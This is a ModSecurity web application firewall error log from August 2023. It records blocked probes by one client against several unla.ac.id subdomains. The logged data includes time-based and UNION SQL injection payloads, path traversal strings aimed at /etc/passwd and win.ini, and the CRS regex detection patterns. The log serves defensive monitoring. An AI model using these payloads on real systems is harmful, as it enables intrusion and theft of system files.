[Tue Aug 29 11:48:50.411631 2023] [:error] [pid 2358] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(16)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14ssCo-f0AAAk2KY8AAAAb"]
[Tue Aug 29 11:48:50.415533 2023] [:error] [pid 2346] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(16)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14ssCo-f0AAAkqHtwAAAAM"]
[Tue Aug 29 11:48:50.427702 2023] [:error] [pid 2379] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(16)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14ssCo-f0AAAlL7C4AAAAq"]
[Tue Aug 29 11:48:51.398493 2023] [:error] [pid 2404] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14s8Co-f0AAAlkwh4AAAAO"]
[Tue Aug 29 11:48:51.405519 2023] [:error] [pid 2418] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14s8Co-f0AAAlyrBkAAAAI"]
[Tue Aug 29 11:48:51.407011 2023] [:error] [pid 2414] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(6)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14s8Co-f0AAAluT1wAAAAe"]
[Tue Aug 29 11:48:51.410381 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14s8Co-f0AAAlUlfsAAAA0"]
[Tue Aug 29 11:48:51.413426 2023] [:error] [pid 2373] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14s8Co-f0AAAlFH7MAAAAk"]
[Tue Aug 29 11:48:52.367370 2023] [:error] [pid 2384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14tMCo-f0AAAlQ3sEAAAAw"]
[Tue Aug 29 11:48:52.406235 2023] [:error] [pid 2408] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14tMCo-f0AAAlo0zkAAAAJ"]
[Tue Aug 29 11:48:52.435459 2023] [:error] [pid 2348] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(16)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14tMCo-f0AAAksktoAAAAN"]
[Tue Aug 29 11:48:52.436062 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14tMCo-f0AAAkAMKkAAAAU"]
[Tue Aug 29 11:48:52.437129 2023] [:error] [pid 2408] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14tMCo-f0AAAlo0zoAAAAJ"]
[Tue Aug 29 11:48:52.452452 2023] [:error] [pid 2381] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14tMCo-f0AAAlNqtIAAAAt"]
[Tue Aug 29 11:48:53.361421 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14tcCo-f0AAAkyx-sAAAAW"]
[Tue Aug 29 11:48:53.364057 2023] [:error] [pid 2349] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-destination-id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-destination-id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO14tcCo-f0AAAktzHEAAAAP"]
[Tue Aug 29 11:48:53.369100 2023] [:error] [pid 2357] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14tcCo-f0AAAk1w8YAAAAY"]
[Tue Aug 29 11:48:53.369711 2023] [:error] [pid 2382] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-destination-id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-destination-id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO14tcCo-f0AAAlOZJ0AAAAu"]
[Tue Aug 29 11:48:53.372307 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-destination-id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-destination-id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO14tcCo-f0AAAjtdCQAAAAX"]
[Tue Aug 29 11:48:53.376454 2023] [:error] [pid 2358] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-destination-id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-destination-id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO14tcCo-f0AAAk2KZMAAAAb"]
[Tue Aug 29 11:48:53.387182 2023] [:error] [pid 2348] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-destination-id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-destination-id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO14tcCo-f0AAAksktsAAAAN"]
[Tue Aug 29 11:48:54.375979 2023] [:error] [pid 2384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14tsCo-f0AAAlQ3sUAAAAw"]
[Tue Aug 29 11:48:54.376332 2023] [:error] [pid 2428] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-destination-id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-destination-id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO14tsCo-f0AAAl8pQcAAAAm"]
[Tue Aug 29 11:48:54.389526 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:date: 2022-05-27' union select 1,2,3,md5('999999999'),5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/"] [unique_id "ZO14tsCo-f0AAAkle1QAAAAD"]
[Tue Aug 29 11:48:54.414447 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:date: 2022-05-27' union select 1,2,3,md5('999999999'),5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14tsCo-f0AAAmIbKQAAAAo"]
[Tue Aug 29 11:48:54.441687 2023] [:error] [pid 2404] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:date: 2022-05-27' union select 1,2,3,md5('999999999'),5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14tsCo-f0AAAlkwiUAAAAO"]
[Tue Aug 29 11:48:54.443924 2023] [:error] [pid 2424] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:date: 2022-05-27' union select 1,2,3,md5('999999999'),5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14tsCo-f0AAAl4sTwAAAAf"]
[Tue Aug 29 11:48:54.446227 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:date: 2022-05-27' union select 1,2,3,md5('999999999'),5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14tsCo-f0AAAjtdCcAAAAX"]
[Tue Aug 29 11:48:55.361821 2023] [:error] [pid 2408] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO14t8Co-f0AAAlo0z4AAAAJ"]
[Tue Aug 29 11:48:55.363832 2023] [:error] [pid 2348] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO14t8Co-f0AAAkskt0AAAAN"]
[Tue Aug 29 11:48:55.376619 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO14t8Co-f0AAAkoTl8AAAAH"]
[Tue Aug 29 11:48:55.379671 2023] [:error] [pid 2373] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:date: 2022-05-27' union select 1,2,3,md5('999999999'),5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14t8Co-f0AAAlFH7cAAAAk"]
[Tue Aug 29 11:48:55.414478 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sbFileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:sbFileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/jsp/help-sb-download.jsp"] [unique_id "ZO14t8Co-f0AAAkGCZUAAAAE"]
